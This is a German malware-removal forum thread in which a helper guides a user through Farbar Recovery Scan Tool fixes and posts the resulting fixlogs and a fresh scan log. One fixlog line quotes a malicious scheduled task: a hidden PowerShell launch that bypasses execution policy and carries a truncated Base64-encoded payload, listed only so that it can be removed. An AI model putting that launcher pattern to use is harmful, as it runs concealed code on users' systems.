C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
C:\Users\Public\Documents\eAHPeNhIUJ
C:\ProgramData\eAHPeNhIUJ
C:\Users\Harun\AppData\Local\bvxvcxxvaf
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


StOony 19.04.2016 20:30
Fixlog

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-19 21:29:34) Run:1
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
*****************

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04C44956-D7CD-4939-8F45-2FF07606F6B9}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C44956-D7CD-4939-8F45-2FF07606F6B9}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\bvxvcxxvaf => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\bvxvcxxvaf" => Schlüssel erfolgreich entfernt

==== Ende von Fixlog 21:29:34 ====

cosinus 19.04.2016 23:02
Wiederhol den Fix. Du hast da den Text völlig unvollständig übernommen.

StOony 20.04.2016 16:23
Fixlog

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-20 17:21:44) Run:2
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
C:\Users\Harun\AppData\Local\ffgogogo
C:\Users\Public\Documents\ffgogogo
C:\Users\Harun\AppData\Roaming\ffgogogo
C:\Program Files (x86)\eAHPeNhIUJ
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
C:\Users\Public\Documents\eAHPeNhIUJ
C:\ProgramData\eAHPeNhIUJ
C:\Users\Harun\AppData\Local\bvxvcxxvaf
emptytemp:
       
*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C44956-D7CD-4939-8F45-2FF07606F6B9} => Schlüssel nicht gefunden.
C:\WINDOWS\System32\Tasks\bvxvcxxvaf => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\bvxvcxxvaf => Schlüssel nicht gefunden.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{113ED8FC-24C5-4F57-AF03-B5534E316C7D}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{113ED8FC-24C5-4F57-AF03-B5534E316C7D}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0E47-0D04-0808-0E11-0D0B0479110F}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\ffgogogoCheckTask => erfolgreich verschoben
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore => erfolgreich verschoben
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA => erfolgreich verschoben
C:\Users\Harun\AppData\Local\ffgogogo => erfolgreich verschoben
C:\Users\Public\Documents\ffgogogo => erfolgreich verschoben
C:\Users\Harun\AppData\Roaming\ffgogogo => erfolgreich verschoben
C:\Program Files (x86)\eAHPeNhIUJ => erfolgreich verschoben
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA => erfolgreich verschoben
C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask => erfolgreich verschoben
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore => erfolgreich verschoben
C:\Users\Public\Documents\eAHPeNhIUJ => erfolgreich verschoben
C:\ProgramData\eAHPeNhIUJ => erfolgreich verschoben
"C:\Users\Harun\AppData\Local\bvxvcxxvaf" => nicht gefunden.
EmptyTemp: => 1 GB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 17:21:49 ====

cosinus 20.04.2016 20:52
Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

http://www.trojaner-board.de/picture...&pictureid=611

StOony 20.04.2016 22:42
FRST

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:18-04-2016
durchgeführt von Harun (Administrator) auf HARUN-PC (20-04-2016 23:39:00)
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Platform: Windows 10 Pro (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.19761.0_x64__8wekyb3d8bbwe\Video.UI.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-07-29] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [5006536 2016-04-04] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => A:\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-04-05] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-04-05] (Raptr, Inc)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Steam] => "A:\Steam\steam.exe" -silent
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify Web Helper] => C:\Users\Harun\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [BingSvc] => C:\Users\Harun\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify] => C:\Users\Harun\AppData\Roaming\Spotify\Spotify.exe [6805616 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8813784 2016-03-11] (Piriform Ltd)
IFEO\playstv_launcher.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\raptrstub.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xfire2.bat [2016-04-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{f44a65a3-dc5f-4cc2-bb7a-f4d941196cd5}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-29] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-29] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF SearchEngineOrder.3: Bing
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-2630849102-760198568-3561441068-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Harun\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [nicht gefunden]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]

Chrome:
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR StartupUrls: Default -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-08]
CHR Extension: (Adblock für Youtube™) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2016-03-05]
CHR Extension: (Google-Suche) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Google Docs Offline) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-15]
CHR Extension: (Sniper Team Game Collection) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-02-07]
CHR Extension: (Top Eleven) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2015-07-29]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Google Mail) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2016-04-03] (Advanced Micro Devices) [Datei ist nicht signiert]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S4 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
S4 Origin Client Service; A:\Origin\OriginClientService.exe [2007048 2015-08-01] (Electronic Arts)
S4 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-04-05] (Plays.tv, LLC)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2015-08-01] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76152 2015-08-02] ()
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4584208 2016-03-29] (AVG Technologies CZ, s.r.o.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [296648 2016-04-04] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [111120 2016-03-01] (Advanced Micro Devices)
S3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [194320 2016-04-12] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-03-29] (AVG Netherlands B.V.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [35880 2016-01-01] (Wellbia.com Co., Ltd.)
U3 idsvc; kein ImagePath
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; kein ImagePath
S3 XFDriver64; \??\C:\Program Files (x86)\Xfire2\XFDriver64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-20 23:37 - 2016-04-20 23:37 - 00016148 _____ C:\WINDOWS\system32\HARUN-PC_Harun_HistoryPrediction.bin
2016-04-20 17:21 - 2016-04-20 17:21 - 00004117 _____ C:\Users\Harun\Downloads\Fixlog.txt
2016-04-19 16:14 - 2016-04-19 16:14 - 00002273 _____ C:\Users\Harun\Desktop\JRT.txt
2016-04-19 16:06 - 2016-04-19 16:13 - 01610352 _____ (Malwarebytes) C:\Users\Harun\Downloads\JRT.exe
2016-04-19 16:03 - 2016-04-19 16:03 - 03683904 _____ C:\Users\Harun\Downloads\AdwCleaner_5.112 (1).exe
2016-04-19 15:33 - 2016-04-19 16:11 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-04-19 15:33 - 2016-04-19 15:47 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-19 15:33 - 2016-04-19 15:33 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-19 15:32 - 2016-04-19 15:57 - 00000000 ____D C:\Users\Harun\Desktop\mbar
2016-04-19 15:32 - 2016-04-19 15:47 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-04-19 13:09 - 2016-04-19 13:09 - 00026993 _____ C:\Users\Harun\Downloads\Logfiles.zip
2016-04-19 13:06 - 2016-04-19 18:01 - 00041147 _____ C:\Users\Harun\Downloads\Addition.txt
2016-04-19 13:05 - 2016-04-20 23:39 - 00015514 _____ C:\Users\Harun\Downloads\FRST.txt
2016-04-19 13:05 - 2016-04-20 23:39 - 00000000 ____D C:\FRST
2016-04-19 13:04 - 2016-04-19 13:05 - 02375680 _____ (Farbar) C:\Users\Harun\Downloads\FRST64.exe
2016-04-19 12:54 - 2016-04-19 12:54 - 00083140 _____ C:\Users\Harun\Downloads\Ereignisse.txt
2016-04-19 12:47 - 2016-04-19 12:47 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Harun\Downloads\Nicht bestätigt 326517.crdownload
2016-04-19 12:39 - 2016-04-19 16:11 - 00000000 ____D C:\AdwCleaner
2016-04-19 12:39 - 2016-04-19 12:39 - 03683904 _____ C:\Users\Harun\Downloads\adwcleaner_5.112.exe
2016-04-19 12:39 - 2016-04-19 12:39 - 00001391 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files\iPod
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-15 17:10 - 2016-03-29 08:40 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-15 17:10 - 2016-03-29 08:40 - 01381376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-15 17:10 - 2016-03-25 09:38 - 24593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-15 17:10 - 2016-03-25 09:25 - 12505600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-15 17:10 - 2016-03-25 09:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-15 17:10 - 2016-03-25 09:13 - 19325440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-15 17:10 - 2016-03-25 08:55 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-15 17:10 - 2016-03-25 08:54 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 03467784 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 01022664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-15 17:10 - 2016-03-16 06:56 - 00861512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01299032 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-15 17:10 - 2016-03-16 06:55 - 01127024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 00601344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-15 17:10 - 2016-03-16 06:54 - 00595016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
